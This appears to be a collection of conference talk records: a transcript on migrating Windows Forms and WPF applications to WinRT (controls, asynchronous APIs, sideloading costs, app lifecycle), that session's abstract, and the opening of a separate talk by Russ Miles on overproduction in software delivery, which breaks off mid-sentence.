But if you want to go to the green side and you start, well, first of all, notice there is no diagram, no line, from Windows Forms into the green side. That's because most Windows Forms applications, and you can tell me if yours is different, but most Windows Forms applications have a lot of code behind click events and lost focus events and other UI events, right? Most Windows Forms have a lot of code behind the user interface, and most Windows Forms applications use datasets and data tables. The combination of those two technologies means that little or none of your existing Windows Forms code, if that's the way you build your applications, none of that code will move forward. Probably is very sad news, but that is the way this works. If you are using VPF, some of your code might come forward. Certainly your skills will come forward. Your knowledge of XAML, your understanding of the new data types like the observable collection, things that were introduced with VPF, those are all valid in WinRT. But I draw a red line because most, in my experience, most VPF applications are written in a way that they talk directly to the database. They're two-tier applications. Those won't carry forward. You have to be at least three-tier. A lot of VPF applications are written just like Windows Forms, where they use a lot of code behind the pages. There's a lot of event handlers behind the XAML. If you've written a lot of code in event handlers behind the XAML, then you have the same problem as in Windows Forms, where it's going to be hard to move that code forward. Also, unfortunately, VPF allowed you to use the dataset. So there's some VPF programs in the world, not a lot, but there are some that use the dataset or data table, and those will have a hard time moving forward. But the good news is that if you've written your VPF applications that are using three-tier or service-oriented architecture and you do not use the dataset, then you're probably going to be able to move some of your code forward. If you're starting with Silverlight, like the one gentleman sitting up on the top row or near the top row, great for you. Silverlight is extremely similar to the Windows runtime. In fact, I often think about or talk about the Windows runtime as kind of being Silverlight version 6. The Windows runtime is a sandboxed environment, just like Silverlight. It requires a three-tier or service-oriented architecture, just like Silverlight. It requires all server communications be asynchronous, just like Silverlight. And so if you've already gone through the work of learning Silverlight, it's not that WinRT is the same, but it's extremely similar. You've already worked through or learned the hard lessons. So when WinRT came out, there was a lot of rumor and discussion about how it really didn't support.NET. Yes, you can use C-sharp, but it's not actually.NET. Has anyone heard that? Is that something you've heard? Well, have you ever heard of this thing called duck typing? If I give you an object or an interface and it looks like a duck and it quacks like a duck, then it must be a duck. So the.NET code in WinRT looks like.NET. It quacks like.NET. So how can you tell me that it's not.NET? It's true. Microsoft created a new runtime for.NET in Windows runtime because it's essentially almost like a new operating system. But you still have C-sharp and C-sharp is the same. You still have the standard system libraries, so all of the basic data types that are in C-sharp and those are the same. 
And you have a lot of the basics; all the things necessary to write business logic in .NET are the same in WinRT. The things that are different are things that don't even exist in Windows runtime. For example, if you use enterprise services, right, COM+, that does not exist in WinRT, so that API is gone. There's no API in Windows runtime to create a web server. It's a client operating system. Why would you ever create a web server running on someone's desktop? So it's true that there's a lot of things from .NET that are not in WinRT, but that's because .NET is also a server-side platform, and this is a client-side operating system or runtime. Yes? Right. So this gentleman is pointing out that there are other things not in Windows runtime that are in full .NET, such as reflection.emit, which is widely used especially by mocking frameworks and some other tools like that. So in fact, the .NET framework, not C-sharp, this is the base class library for the .NET framework, has something like 20,000 APIs. Silverlight has something like 3,000 APIs. Windows runtime has something like 1,500. Just to give you an idea of what's missing. But I think that you have to understand two things. One, the Windows runtime is designed to be a client-side operating system that runs in a secure sandbox that makes it extremely difficult for someone to create malicious or bad code. And this is not an accident. Right? How many of you have iPads? Right? Several? When you download an app from the store and onto your iPad, do you worry about getting a virus? Do you run an antivirus program on your iPad? No. No one worries about this. Do you run antivirus on your Windows computer? When you go to the Internet and you download a program, do you worry that it might not be a real program, but it might in fact be a virus? Right? How many of you have Android devices? How many of you run antivirus on your Android devices? Really? Oh, you are so naive. Right? Most people that I know run antivirus on their Android tablets because the Google Play Store is pretty safe, but there are other places that you can get Android applications that are in fact viruses. And that's because Google has not done as good a job as Apple or now Microsoft in making sure that it's really hard to write bad code. And by bad, I mean malicious, dangerous, right? Viruses or Trojan horses. And so, yes, the missing reflection.emit is bad. Maybe they will add some parts of it at some point in the future, but right now, I think they look at it as being too dangerous. Right? And their primary concern is that they want Windows 8 to be as safe as an iPad. And I think for all of us, for instance, my kids are sitting in the top row, and I'm going to pick on them since they're here, but one of them had a school assignment where he had to create an audio recording. And so, he went and downloaded an open source product called Audacity, which allows you to record audio and edit that audio. And then he had to convert that into an MP3. And so, on my instructions, he went and downloaded an MP3 encoder. But when you Google for this encoder, the first entry that you get back from Google is not the real encoder, it's a virus. And so, of course, when he installed this encoder, he had picked the first one, which looked like a real website. It ran an installer that looked like a real installer, and it was a horrible virus. Right? I mean, we can't continue to live like this.
Personally, the faster that we all get off from Windows and onto either an iPad or Windows RT, the happier I will be, at least as a father. Sorry, Marcus. So when you're programming in the Windows Forms, you understand all of the controls in Windows Forms, and perhaps you've purchased third-party controls from Telerik or Infragistics, and you learn all of these controls. And then if you move to VPF, you have to go learn a whole new set of controls. Right? So they're similar, but they're not the same. And if you go to Silverlight, you have to learn a whole new set of controls that are similar but not the same. So when you go to the Windows Runtime, you should expect that you'll have to learn a whole new set of controls that are similar but not the same. Right? This is, I think, only to be expected. What is different about the Windows Runtime, and what I think is really exciting, is that in Windows Forms, all of the controls are written in.NET. They're not operating system-level controls. They're not Windows controls. They're.NET controls. And in VPF, all of the controls are.NET controls, and the same is true in Silverlight. So they're not operating system-level controls. They're abstractions on top, and so they have performance issues sometimes, and they are not necessarily consistent with every application on the operating system. Right? The list box or a button will look a little bit different or act a little bit different from a real button. In Windows Runtime, the list of controls on the screen are available to you, and they are operating system-level controls. And these are some of the most common controls that are used to build Windows itself, and also are controls that you will almost certainly use when you build your applications. And I don't have time in this talk to go through and show you examples of all of them, but let me show you just some of the controls and how they're used just in normal applications inside of Windows. For example, suppose that you want to show a list of items and have it work with the keyboard and the mouse and with touch. And suppose that you would like those list of items maybe to have images and then be able for the user to click on them. This is the start screen in Windows 8. This start screen is created using a grid view control. You have access to the grid view control. So all of the behaviors that you see here in terms of rapidly scrolling, if I can get my mouse to work, rapidly scrolling back and forth, being able to select items or being able to just click on an item and have it give you a click event, are all available to you. And because it is the operating system-level control that Microsoft is using and you have access to the same control, your application will look and feel the same as every other Windows application to an end user. So this is good. It reduces training for the user, but it also means that your application will be consistent with the rest of Windows and it means that your application will tend to be faster than if this was a control created by the.NET team instead of by Windows itself. If I run the finance app, we can see some other controls. So first of all, the finance app is a side-scrolling application with different types of content. This is also a grid view control. So this is the same control used to create the start screen, but it's styled differently so that it shows different size tiles in different groups. 
If I look at a specific news item, now I'm in some sort of a text viewing control, but if you look closely off to the side over here, you can see that there's, where's my mouse? There it is. You can see that there's kind of an arrow that appears and I can pan or scroll through content. This control is called a flip view control and it flips through views. No surprise. But again, this is a control that you have access to. And in order to use it, you just have a collection of content or a collection of objects and you bind it to the flip view and it does all of the work of rendering it and it does all of the work of animating the transitions so that you don't have to worry about that. It just does the right thing. Up here is a back button. This back button is not part of the operating system. It is part of the actual application. So it's just a button and it's using a special glyph or graphic to get the arrow. But the code behind this button is one line of code and that's because built into the Windows runtime is a navigation framework. So every time that your application wants to show a new page or a new form, you use the navigation framework and say navigate to this new form. The great thing is that the navigation framework keeps track of where you were so that behind this button, there's one line of code that says navigation go back. And it goes back to where I was. So again, inside of your code, you don't have to worry about those details because the operating system, or the runtime, is helping you do that. If we look at the weather app, this is similar where it's using a top-level grid view control. But here, there's too much content to fit. This is the detail hourly forecast for where we live in Minnesota. And as you can see, the current weather is raining and cloudy. But now this scrolling up and down could be a list box control, but it's not. It's actually something called a list view control. The list view control is an operating system list control that understands how to scroll vertically; usually it's vertical, but you can restyle it because this is XAML after all. The last thing that I will point out, or maybe not the last, but moving on, on this screen, they use something called semantic zoom. And so here, I'm looking at this list of programs, and this can get quite long if you install a lot of software and just let it throw the tiles onto your screen. So maybe you want to get a kind of a big picture view. And so this is using a control called semantic zoom. A semantic zoom control is a single control that just has two different views, a zoomed in view and a zoomed out view. And all you have to do is define the XAML for the zoomed in view and the XAML for the zoomed out view, and the control does the rest of the work as the user interacts with it. All of these controls, so I'm using a mouse, but all of these controls work with touch as well, so it's a pinch or zoom type motion. And you might say, well, but Rocky, that's a visual zoom. This just made it bigger. Right? So let me show you another example. Here I am in the weather application, and there's a lot of different kinds of information in this weather application. If I use semantic zoom, now it completely changes the display to just say, OK, you zoomed out. Here are the big categories of information available in this application. And so now if I say that I would like to see maps, it'll just bring me to the map part of the display. So it's not a visual zoom.
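As a hedged illustration of that navigation framework, here is roughly what the click handlers might look like in a Windows Store XAML page; the page and control names are made up for the example:

using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;

public sealed partial class ItemsPage : Page
{
    // Navigate forward; the Frame remembers where you came from.
    private void ItemGridView_ItemClick(object sender, ItemClickEventArgs e)
    {
        Frame.Navigate(typeof(ItemDetailPage), e.ClickedItem);
    }
}

public sealed partial class ItemDetailPage : Page
{
    // The back button really can be essentially one line of code.
    private void BackButton_Click(object sender, RoutedEventArgs e)
    {
        if (Frame.CanGoBack) Frame.GoBack();
    }
}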
Semantic zoom is not like zooming in closer to an image. It's changing between two different views, and it's really up to you as a developer or a designer to think about, if the user zooms out, what would you like to show them to make it easy for them to navigate between parts of your application? Let's see. What else? The one last thing that I think I need to show you is that when I'm in an application, with touch I either swipe down onto the screen from the top or swipe up from the bottom, or use the right mouse button, and I get what's called an app bar. And this is really the replacement for the tool bar that you would find in Windows Forms or VPF. The app bar has two parts, a top app bar and a bottom app bar. You can use either or both. So this application uses both. If you follow Microsoft's design recommendations or guidelines, they recommend that the top app bar be used for big navigation. So if you're creating a text editor, each open document would probably be a tab across the top of the app bar. Or if you're running Skype and having multiple conversations, each conversation will be across the top of the app bar. The bottom app bar should be used for more of what you would think of as a tool bar approach. So this one only has one icon for help, because there's only so much that you can do in this application. But the idea is that over here on this side of the app bar, you will have icons that give the user the ability to interact with the current view on the screen. And over on the right-hand side, you'll have buttons that allow the user to interact with the application as a whole. Right, so not necessarily the current view. Excuse me. Uh-oh. So there are a couple other controls here that I'm not going to take the time to show, but I'll talk about briefly. And that is that there's a web viewer, which is basically Internet Explorer 10 that you can embed into your application. You have access to the operating system's native progress bar and progress ring. Those, even though it seems so simple, to me are a great thing, because what application doesn't use some sort of progress indicator, and every application seems to invent its own, like in VPF, and so they never look the same. Here they can all look the same, they'll follow the color schemes set by the user for their operating system, and so it'll give the user a more consistent behavior. The Windows runtime at its core is actually built on top of something called COM. Now some of you might not have ever heard of COM, or some of you remember COM as being that thing from the 1990s that we escaped by going to .NET. Well it's back. The good news is that Microsoft is using something called a projection, so they take the runtime operating system and wrap it with extremely thin .NET classes. So when we're interacting with the operating system, we think we're just talking completely in the .NET world. And this is different. Again, at this point somebody might say, well, oh, well then that's no good, because .NET is a wrapper over the top of Windows, I should just go program C++. I don't know if anybody actually says that, I mean really who wants to program in C++. But, sorry Marcus, there too my son learned C++, and now I'm telling him he wasted his time. So moving on, the thing is that these lightweight projections are really extremely thin. And so, like, the list box control in VPF is actually a control written in VPF that behind the scenes makes calls into the underlying Windows graphics engine, right?
The list view control in WinRT is in fact the Windows operating systems list view. All they did is create a.NET friendly class that has properties and methods that directly map into the properties and methods of the control. So there's a very large difference between something that abstracts the operating system like VPF and something that just wraps it with a super thin layer like we have in WinRT. WinRT has a new application model, and I'll talk about this in a little bit, but it's important I think, and this is one of the biggest things you have to understand moving from Windows forms or VPF where the application is either running or it's not running. And you go into the Windows runtime where applications might be running, they might be suspended or they might be not running. So there's actually a whole new mode for your application which is that it could be in memory but not running. So it's suspended. I'll talk about that in a little bit more detail. And the other big area that will cause a lot of challenge for most developers is the amount of asynchronous programming that is required. I mentioned earlier that in Silverlight, Microsoft said that all server-side calls had to be asynchronous. Anyone want to guess why that is the case? Well, Silverlight was designed to run in the browser, and almost all of the browsers only run on one thread. So if your Silverlight application, which is using that one thread for the whole browser, makes a call to the server, right, it calls a web service, and it blocks. It's a synchronous call, right, then that thread becomes blocked. And what happens to the browser? It becomes blocked. So the user can't even switch to a different tab in Chrome because Chrome itself is going to be completely blocked. And Microsoft could not allow that to happen because if they did, then Silverlight would get a very bad reputation very fast. And so they said, in order to make sure that all of us as developers don't accidentally start locking up everyone's browser, they made a rule that the only APIs for talking to the network were asynchronous. And so that was hard, right, the gentleman that does Silverlight. That might have been a, for most of us, it was a substantial learning curve to figure out how to do asynchronous programming. In Windows 8, Microsoft is really trying to compete with the iPad and with the Android tablets. And for those of you who have iPads, when you're moving around and interacting with your iPad, does it ever lock up? No, not really. I mean, if it does, it's very rare, right? It doesn't even glitch, usually. In other words, when I'm swiping through a list of items, it's very, very rare for a tablet to just kind of freeze even for a part of a second. Because users see that, right? As they're swiping with their finger, if the graphics underneath the screen and their fingers stop being in sync, the user sees that right away. And so with Windows 8, Microsoft wanted to make sure they had an operating system that worked well with tablets and with touch and was competitive with something like the iPad. Well they can do as much as they want to in the operating system, but if your code or my code freezes up the application, then the entire operating system looks bad, right? I mean, we might know the difference. I might be able to say, oh, that's not Windows. That's my bad programming. But to the end user, it's all Windows, right? They don't see the difference between the operating system and your application. 
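To make the contrast concrete, here is a small sketch of the asynchronous style this pushes you toward in C# with async and await; the URL and type names are made up for the example:

using System;
using System.Net.Http;
using System.Threading.Tasks;

public class QuoteService
{
    private readonly HttpClient _client = new HttpClient();

    // The await frees the calling (UI) thread while the network call is in flight,
    // so scrolling and touch stay responsive instead of freezing.
    public async Task<string> GetLatestQuoteAsync()
    {
        return await _client.GetStringAsync(
            new Uri("http://example.com/api/quotes/latest"));
    }
}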
And so Microsoft made a rule that said, as they created the API for the Windows runtime, anything that can take longer than 50 milliseconds, that's 5-0 milliseconds, which is a very short period of time, anything that could take longer than 50 milliseconds will be an asynchronous API. So think about what that means, right? Talking to the hard drive easily takes longer than 50 milliseconds, talking to the network, talking to the camera, talking to the microphone, talking to the user. If you bring up a dialogue that requires the user to click or tap or interact, users never can respond within 50 milliseconds, so even bringing up a dialogue box has to be asynchronous. And so this requires a pretty substantial way of rethinking because most of us, especially in Windows forms and VPF, are used to just making method calls and everything is synchronous. And yes, when I talk to the database, the application freezes, but the user can live with it. That's always been kind of our mentality as developers. And now Microsoft is on the side of the users and is saying, you know what, enough of that. The users hate it when applications freeze. We'll make it really hard for you guys as developers to create essentially bad applications or bad user experiences. So far, everything that I've said to me seems positive. And I'll revisit some of those in a little bit more detail, but in the middle of this talk, I need to give you what I think is the bad news. Before I do that, I have to ask you, how many of you are planning to use Windows 8 or the Windows runtime to create consumer applications, things like games or small apps that maybe do Twitter or things not for business, but just for end users? So one, two, three. So Microsoft is with you three. When they thought about how to deploy winRT applications, the first thing they did is they figured out a really pretty good store solution. So if you're trying to build applications for anybody in the world, or at least anybody in Norway or Europe or whatever you want, you're going to submit them to the Microsoft store. Microsoft will run that application through a series of tests to try and make sure that you don't have any malicious code or that your application doesn't just fail completely. Microsoft doesn't care if your application is actually any good. They don't care if it's useful. They just care if it's damaging. And so if you look already on the Microsoft store, just like on the Apple store, there are already hundreds, if not thousands, of horrible apps. And you can spend your money buying all of these horrible apps, but at least you know that they will not harm your computer. They just waste your money. Not to say that you three are going to create horrible apps. Don't do that, please. But the rest of you are probably going to build applications that are for people inside of your organization. Is that true? For your customers, for your employees, something like that. And so you're probably not going to try and deploy through the Microsoft public store, because if I've written an application that manages my internal inventory or allows me to enter account information for my customers, I really don't want anybody on the planet to be able to run my application. And so then I probably want a private store. Microsoft currently has a very limited story around the private store. This is the disappointing news. And then as the slide goes on to point out, you can also deploy for development and testing. That's a pretty good story. 
And you can deploy on the Win32 side, just like you always have, using ClickOnce or using MSIs or any of today's technologies. But here's what happens if you want to do a private store. It's a two-step process. Step one is that you have to unlock your computers for side loading. What this means is that by default, when you get a Windows 8 computer or tablet, it's not possible to put your own applications onto that machine. There's a licensing block that prevents you from installing applications onto your own computer. Now if you are a developer with Visual Studio, the first time you try to open up a Windows store project in Visual Studio, you will get a dialogue from Visual Studio prompting you to get a developer key. And those are free, and they last for one to three months. In my workshop yesterday, I said three, because mine lasts for three. But a couple people in the class said theirs were only good for one month. So maybe I'm special. I don't know. But these keys are free, and they will give them to you to unlock your computer so that you can do your own debugging. So then suppose that I build an application, and I want all of you to install it, and you don't have Visual Studio. Well the first thing that we have to do is unlock your computers. And this table shows for the different versions of Windows 8 how much that will cost. So if you have a Surface RT or some other ARM-based Windows 8 machine, it will cost you $30 to unlock your device. If you have a Windows Pro machine, which most of us as developers probably have Windows Pro, it will cost you an extra $30 US to unlock it. If you have Windows 8 Enterprise, and you are not joined to a domain, then it will cost you $30. And if you have Windows 8 Enterprise, and you are joined to a domain, then it's free, because it's part of your domain license. The one that I skipped is Windows 8, not Pro or not Enterprise. What I always think of as Windows 8 Home, it's the kind of Windows 8 that most people buy when they go to an electronics store to buy a home computer. Those devices cannot be unlocked. So most people's home computers will never be able to side load or run your business apps. Everybody happy with this? Do you like this story? Yes? I like it very much, because what are we going to do with the VPS, for example, legacy applications that want to move to the Windows 8 home? How do we move about that? Legacy applications, like Windows Forms? VPS. Sorry? WPF. Oh, VPS. But see, VPS applications run on Win32, and so they're not affected. This is only to unlock for the new Windows runtime platform. But if you want to use touchy, that's the stuff. I understand. Right? Remember, I don't work for Microsoft, right? So don't throw things at me. Or what is it? Don't shoot the messenger, right? But it gets worse, I'm afraid, because I say $30 per device, but you can only buy these keys in a pack of 100. So the minimum cost is $3,000 US dollars. So if you have a small company with maybe 10 employees, you still have to spend $3,000 to unlock all 10 of your devices. Now I don't like this story. I think this is really bad. And I've done a lot of blogging about this, and I've talked to many people at Microsoft, and I've tried to convince them that they're wrong. And so all I can do is tell everyone the way that it is, and then all we can do is try and tell Microsoft that we don't like it, right? Because it's not good. The thing is that once you have unlocked your computer, you can install as many applications as you want to. 
This is a one-time fee per device. Yes. You can still, if the computer is an Intel-based computer, you can continue to install Win32 apps, like VPF, Windows Forms, even Silverlight, on Windows 8 at no additional cost. But if you want to use the new WinRT programming model, then you have to pay extra, right? If you create a WinRT application, like today you just start up and create a new WinRT application, it will not run in desktop mode. It will only run in WinRT. Because it's a, and maybe I wasn't real clear, but the blue and the green slide with the Win32 and the whole Windows runtime, they really are like two different operating systems. If you write a program in Win32, that program cannot see or interact with a program running in Windows runtime. And if you create a Windows runtime program, it cannot see or interact with any programs running in Win32. They're completely separate. I think that one of the biggest problems is that if you continue to create a WinRT application, you don't have the ability to create Windows 7. In our company, our customers experience a lot of XP. I mean, it takes five to ten years. Right. You're not, yeah. You're jumping to the end of my talk. So, all right. So one more thing on this slide, and that is I said it was a two-step process. Step one is to unlock your devices, right? That's what costs the $30 per device. Once you've unlocked my device, it's unlocked forever, but that key is non-transferrable. So if it's my device, my personal device, and I leave your organization and go to another organization, my device remains unlocked. All right. So these keys are used one time, and they're not transferrable. But then you still have to actually deploy the application. And there's really two ways to deploy WinRT applications. One of them is using Microsoft's product called Intune, which is a product you buy from Microsoft that gives you a corporate store or a private store. And Intune costs either six, eight, or eleven dollars per device per month. That's the price for this tool. And there are three different versions of Intune. So it depends on the price can be different. So I saw you guys laughing. This is also maybe not a great story. So if you don't want to pay for that extra cost, the second option for deploying applications is that you can run PowerShell scripts to do the deployment. And one of the people at Microsoft I was talking to suggested that the best way to maybe do this is to put the application on a USB thumb drive and have a low-paid employee like an intern maybe go to every device to do the installation. You might remember this as being something called sneaker net in the mid-1990s. Is that a term in Europe where someone would run around with their sneakers to do all of the installing? Yeah? Right. So apparently some of the people in Microsoft still think that it's 1994. You can, of course, put that PowerShell script on a shared file server inside of your company. So that's maybe a little better. Microsoft just announced that in Windows 8.1, which is the next version that's coming before the end of this year, they're going to open up some of their APIs so that third parties so other companies can create some products to compete with Intune. And so maybe that will make this a better story. So Windows Forms, when you go to develop, you use Visual Basic, you use C-Sharp, you use the Windows Forms designer, and then probably your data is either in a data set or a data table or maybe it's in some.NET objects. 
If you do VPF, it's pretty much the same except that instead of Windows Forms and its proprietary form designer, you can use XAML. Silverlight is basically the same except that Silverlight does not support the data set. So there's no data set and no data table. How many of you use data sets or data tables? So those of you who raised your hand, you're going to have to move off from the data set and data table onto the use of objects and collections. And that's because Silverlight and WinRT are the same and that there is no data set and there is no data table. And so everything is based on the use of objects. So your primary areas of concern as you move forward or look at how do I use WinRT, today if you do not use XAML, you should start learning XAML. The closest type of XAML is Silverlight, but VPF is pretty close too. Basically if you use VPF as though it were Silverlight, you'll learn the right kind of XAML. The history of this, and I'm not going to have enough time to go into it in depth, but VPF came first and Microsoft tried a lot of really interesting things and discovered that some of the more advanced features in VPF were too hard for most people to figure out. And so when they created Silverlight, they took away the parts that most people struggled with and they added in some other parts that were simpler. And when they created WinRT, they really copied Silverlight pretty much as they created the WinRT version of XAML. And so if you use some of the most advanced XAML in VPF, then you're going to have trouble going forward. But if you're using something very similar to Silverlight XAML, it'll probably be very similar and some of it can even be copied and pasted into a WinRT project. Data access. In Windows Forms and in VPF, most applications talk directly to the database. There are two-tier application. In Silverlight and in WinRT, there is no data access API. There is no system.data. You have to call a web service or a WCF, I guess VCF service, in order to get your data from an application server. Now if you already use an application server, you're in perfect shape. Your service will probably continue to work as long as it's not returning data sets, because there is no data set. Data binding in WinRT is XAML binding. And so if you use data binding or XAML binding in VPF or Silverlight, it's the same in WinRT. If you do Windows Forms, you might or might not use data binding. Right? There are some of us, like myself, really worked hard to learn and make Windows Forms data binding productive. Other people, like my good friend Billy Hollis, said this is too much work and he never used Windows Forms data binding. But when you go to XAML, you really have to use data binding. There's no real option here. I already talked about the asynchronous behaviors. I talked about the sandbox. I talked about navigation. I do want to talk briefly if my slide will advance. There we go. Okay, I talked about that. I want to talk about the application lifecycle. This is also very important, because in Windows Forms or VPF, the user starts your application, your application runs, and then the user closes your application and it's gone. And as long as the application is running, it can do anything. It's always working. Even if it's not visible, if the user minimizes the application or hides it behind another window, it's still running, right? But in WinRT, only the application that's visible to the user is actually running. 
And so when I'm looking at the stock app, this app is currently running because it's visible on the screen. And if I switch to the weather app, now the weather app is running because it's current on the screen. And what happened to the stock or finance app? It is suspended, which means that it's still in memory, but it's not getting any CPU time. None. It also means that right now, if the computer starts to run out of memory, it might just get rid of the stock app. And you won't be notified. It just clears it out of memory to recover the memory. It's also the case that the user could go over to the sidebar, find the stock app, and they can right click and say close, and it just went away. And that finance app was not notified that it was going away. So what this means is that as you develop WinRT applications, you have to think that your application is in only one of two states. You get an on launched event when the application starts, and that allows you to start up and do work. And then at some point, your application will become suspended. And the way you have to think about this is that you may never come back from being suspended. So when you get the on suspended event, you have to save any data that actually matters. Because from being suspended, you can be terminated, and you won't know that you were terminated. You can be terminated because the operating system ran out of memory, or because the user closed your application, or because the user shut down the machine. And so Microsoft has events built into the platform to make this possible or easy, well, manageable, but it's definitely a new concept. So I have exactly four seconds left, but I want to close this talk by suggesting this. WinRT is version one. And as such, I think it's going to take some time.
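As a hedged sketch of the launched and suspending events described a moment ago, modeled on the shape of the default Visual Studio Windows Store template; the state-saving call is an illustrative placeholder, not a real API:

using Windows.ApplicationModel;
using Windows.ApplicationModel.Activation;
using Windows.UI.Xaml;

sealed partial class App : Application
{
    public App()
    {
        InitializeComponent();
        Suspending += OnSuspending;
    }

    protected override void OnLaunched(LaunchActivatedEventArgs args)
    {
        // Set up the root frame here, and restore any saved state if the app
        // was previously terminated while suspended.
    }

    private void OnSuspending(object sender, SuspendingEventArgs e)
    {
        // You may never come back from suspension, so persist anything that matters now.
        var deferral = e.SuspendingOperation.GetDeferral();
        // SaveApplicationState();  // placeholder for your own persistence logic
        deferral.Complete();
    }
}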
|
So you have a big investment in Windows Forms or WPF, but it is clear that the future of the Windows smart client is the Windows Runtime (WinRT). What strategies can you use to salvage at least some of your existing code over the next few years? It does help if you are already using XAML in WPF or Silverlight, but there are still differences moving to WinRT. In this session you’ll learn about those differences and get the information you need to start getting your code ready for the future.
|
10.5446/51501 (DOI)
|
Okay, through this microphone thingy. Hands up if you can't hear me. If I sit down. All these questions where people don't move. Yeah, good afternoon. Russ Miles, I'm here in Oslo for the first time in my life. I'm very pleased to be invited. And I'm just biding time now. Really, I'm trying to just waste a bit of time until we can lock the doors because I do want to first say thanks for coming to this talk. I'm competing with Uncle Bob. That can't be easy. And also, let's be honest, the title of the talk probably didn't endear itself wonderfully to you at first glance. Who here is a developer? Thank you for coming to a talk that says you're not only a developer. Originally, when I wrote the talk down, I said, you're not a developer. And I thought, no one's going to come to that one. So I softened it a touch by putting the word only in there. And I could easily have called it something different. I could have come up with a different name such as don't fear the change agent. Because this talk is going to be a little bit odd. I noticed on the program that it talks about this talk being inside the buckets of agile and architecture. Sort of true. But I also want to do a little bit more than just agile and architecture. Who's seen me speak before? Anywhere, online, offline, in different line. Okay. Russ Miles, I help teams deliver valuable software frequently, pretty much. I do that using simplicity as much as possible. So I have some principles that I apply. But this talk isn't about necessarily a specific set of guidelines for building architecture or writing code, which is my usual talk series. This is more about the approach I take to building software. To doing anything with the teams that I work with. So what I'd like you to do, if you don't mind, I want some enthusiasm in the room, which is not easy at 4:20 on the first day. I'd like you to buy in a little bit into the idea of changing the world just a touch. I'm not talking about a complete groundswell. I'm talking about a small shift. But a small shift in thinking, which is not an easy thing to achieve. And I would just like to push you gently in this direction, if you will, for the next 40-odd minutes, if I get my timings right. And the reason I want to push you in a direction is because there are a number of endemic ills to our profession at the moment. So, do you want to shout out any problems you still see in software delivery today? We've just had 10 years now of agile processes and frameworks and tooling and expertise. We've had many, many decades now of our profession. Do you want to suggest any particular ailments that you see in your software delivery process, that you keep encountering? Any suggestions from the floor? Estimating is a veritable nightmare. It's a real guessing game. Yes, absolutely. Why is estimating a problem? Why is estimating itself a problem generally, do you think? It's an absolute nightmare. There are several reasons why estimation is a challenge. Estimation, at least, is a challenge because as you build software, it gets slower to build software. The software that you built yesterday tends to hold you back a little bit today, and it increases. So factoring that in alone, which is somewhat of a natural, endemic problem of what we do, is very tricky even with experience. So as John pointed out, experience helps with estimating. Estimating is certainly one area that I believe we need to give some attention, should we say.
There's one other area that I'd like to really hit today and it's a weird one because it wouldn't have been the first one on our minds about 10 or 12 years ago if someone had asked you what's the problem with what we do, why aren't we delivering what people want, or whatever the problem might be. This problem is almost a new problem to us because we've now managed to make the engine work. A lot of the clients I work with have teams that are starting to deliver. So the original challenge that I used to be given was can you help these teams deliver something. A very large organization that I worked with, and I don't think I should be sharing this, but they had a budget of 60 million a year for just their IT. And they'd spent five years and they delivered nothing. That's a lot of money by anyone's standards, I think. So that was the problem I used to get maybe 12 years ago. I still get it sometimes now. But the problem of can you help us deliver something please is being slightly replaced now with this particular demon. Which is we are producing something but it's not what people want. We've managed to make the engine function and now the hose pipe is on and we're drowning in what we don't want. So this talk is about this problem. And I'd like to just give an example, a story if you will. So in the past when I've given this talk people don't necessarily have an agreed definition of what overproduction is. And there's lots of very good academic definitions. But the one I like to use, I think, brings it home. Who here is married or in a significant relationship with someone? Cool. Okay. So, married or in a significant relationship. You come home. You notice that your partner is a little bit tetchy tonight. You don't know why. So what do you do? If you've got children you make sure they're quiet and they're fed and they go to bed. You maybe do a bath for him or her. You maybe tidy up. You start to scrabble for ideas. You're doing loads of things to try to in some way lighten her or his mood. You light the candles. You choose the movie. You cook the food. You get the picture. At the end of the evening he or she turns around and says, why didn't you ask me how I was when you came in? And that was all you had to do. You have overproduced on a grand scale. For me, if anyone ever asks what overproduction is, that little story runs through my head: trying to do everything. Let's be honest, you're doing loads, but you're doing the wrong thing. Those of you who don't know me, I tend to like to tell stories about the work that I do with my different clients. I love doing that. They're not so keen sometimes. But that's the way it goes. I'd like to start with a confession as a consultant. This is not an easy confession for me to do. The idea being I was brought into a large organisation in order to help their teams get themselves set up, forming and delivering. Day one, turn up, I meet the teams. The people are great. The people are experienced. They've got the skills. They've got the passion. All of the things that Uncle Bob talks about, they've absorbed it and they're doing it. Everything that Dan North talks about, they've absorbed it. They're doing it. They're abandoning some of these things because they don't work for them, which is great. They're even thinking for themselves on these things. That's wonderful. The people are good. I wonder if maybe the team needs a bit of work, but no, the teams formed quite well. They all get on very well. Worse, they appear to be delivering software. What am I there for?
I have a moment of insecurity. I think maybe they don't understand the problem. Turns out the problem is well defined. I'm talking to the business. The business say, well, we've got this process. It's about 10 minutes long. We've got hundreds of people doing it. It's a ridiculous process that they do. They have to go to multiple systems to get a simple answer, and then they can action it based on that answer. They can make a decision. That seems well understood. What's the software being created to do? It collapses that process down as much as possible so that we don't have to have all these people doing this job all the time. We would rather these people do something else with their lives. At this point, I'm sitting there thinking this is great for them. But for me, what am I supposed to fix here? Because everything seems to be pretty good. Everyone understands it, there's a lot of collaboration going on with the business. Everything looks reasonable. They've got a roadmap. They've got a plan for the future. They've got another two years worth of development effort. At each stage, they reckon they can break this process down to roughly, eventually, one minute. I speak to my stakeholder now. I tend to be an honest person most of the time. I say, what am I here for? I'm sorry. I'm not cheap. What am I here to do? I don't do gigs where I turn up and just handhold people and say, you're doing things fine. I like to be somewhere where there's a challenge. She said, okay, how about you go and look at the business? As a last chance, go and see the users and see what they're doing. Maybe get ingrained in the process there, see what's going on. If everything's fine, thank you very much. You've come in. You've validated what we're doing. Brilliant. Everyone's happy. So off I went to see the users. This is where the confession comes in. Within about ten minutes of being with these particular users, who are lovely people, I realized that everything we were doing was wrong. We had the right team. We had the right choice of technology stack. There was enough interesting new stuff to play with and lots of old stuff to work with that gave us a comfortable level of experience that we could meet the estimates that were beginning to be formed. So we had the right team. We had the right estimates. We understood the business problem and we were still doing the wrong thing. I want to just leave you with that because by the end of the talk, we'll come back to it and I'll explain exactly why we were doing the wrong thing. In the interim, I'm going to take you on a bit of a journey because I don't want this to be a negative talk. I don't want this to be one of those, oh, we do stuff wrong still. I would like us to remind ourselves first that we've actually done an awful lot. Well, we've come a long way. So I'm absolutely appalling at remembering names and dates. It's one of the reasons I have quite so many relationships that end tragically. I'm rubbish with names and dates. So when it comes to historical stories, there's only one story I can tell you which is my own, and I may get the names and dates wrong. So if anyone invented anything in here and I get your name wrong, I'm sorry. But please know, I do mean to get it right. So my story started about 12 to 14, maybe 15, 16 years ago now, crikey. And you can imagine me on my first day, fresh-faced, turning up to my first professional software delivery role. I'd done software before. I can best describe it as chaotic, anger-driven 